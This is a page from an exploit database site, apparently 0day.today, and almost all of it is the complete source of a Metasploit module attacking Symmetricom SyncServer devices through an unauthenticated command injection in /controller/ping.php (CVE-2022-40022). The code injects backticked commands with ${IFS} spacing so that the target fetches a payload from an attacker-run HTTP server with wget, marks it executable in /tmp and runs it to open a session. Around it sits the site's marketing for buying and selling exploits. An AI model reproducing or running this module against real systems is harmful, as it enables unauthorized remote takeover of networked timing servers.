0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Symmetricom SyncServer Unauthenticated Remote Command Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.
The S100 through S350 (End of Life) models should be vulnerable to
unauthenticated exploitation due to a session handling vulnerability.
Later models require authentication which is not provided in this module because we can't test it.
The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
Run 'check' first to determine if vulnerable.
The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT
and LPORT while testing this module.
},
'Author' => [
'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module
'Justin Fatuch Apt4hax', # Exploit PoC
'Robert Bronstein' # Metasploit Module
],
'References' => [
['CVE', '2022-40022'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']
],
'DisclosureDate' => '2022-08-31',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[ 'Automatic', {} ],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
}
)
)
register_options(
[
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])
], self.class
)
end
def primer; end
def on_request_uri(cli, req)
@pl = generate_payload_exe
print_status("#{peer} - Payload request received: #{req.uri}")
send_response(cli, @pl)
end
def check
uri = '/controller/ping.php'
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'currentTab' => 'ping',
'refreshMode' => 'dirty',
'ethDirty' => 'false',
'snmpCfgDirty' => 'false',
'snmpTrapDirty' => 'false',
'pingDirty' => 'true',
'hostname' => "\`id\`",
'port' => 'eth0',
'pingType' => 'ping'
}
})
if res && res.body.to_s =~ /uid=0/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def request(cmd)
uri = '/controller/ping.php'
send_request_cgi({
'method' => 'POST',
'Content-Type' => 'application/x-www-form-encoded',
'uri' => uri,
'vars_post' =>
{
'currentTab' => 'ping',
'refreshMode' => 'dirty',
'ethDirty' => 'false',
'snmpCfgDirty' => 'false',
'snmpTrapDirty' => 'false',
'pingDirty' => 'true',
'hostname' => cmd,
'port' => 'eth0',
'pingType' => 'ping'
}
})
end
def exploit
srvhost = datastore['SRVHOST']
srvport = datastore['SRVPORT']
filename = datastore['FILENAME']
resource_uri = '/' + filename
shell_path = '/tmp/'
cmds = [
"\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",
"\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",
"\`" + shell_path + filename + "\`"
]
start_service({
'Uri' => {
'Proc' => proc { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}
})
print_status("#{rhost}:#{rport} - Exploit started...")
print_status("#{rhost}:#{rport} - Sending wget command...")
request(cmds[0])
sleep(3)
print_status("#{rhost}:#{rport} - Making payload executable...")
request(cmds[1])
sleep(3)
print_status("#{rhost}:#{rport} - Executing payload...")
request(cmds[2])
sleep(3)
end
end
# 0day.today [2024-11-16] #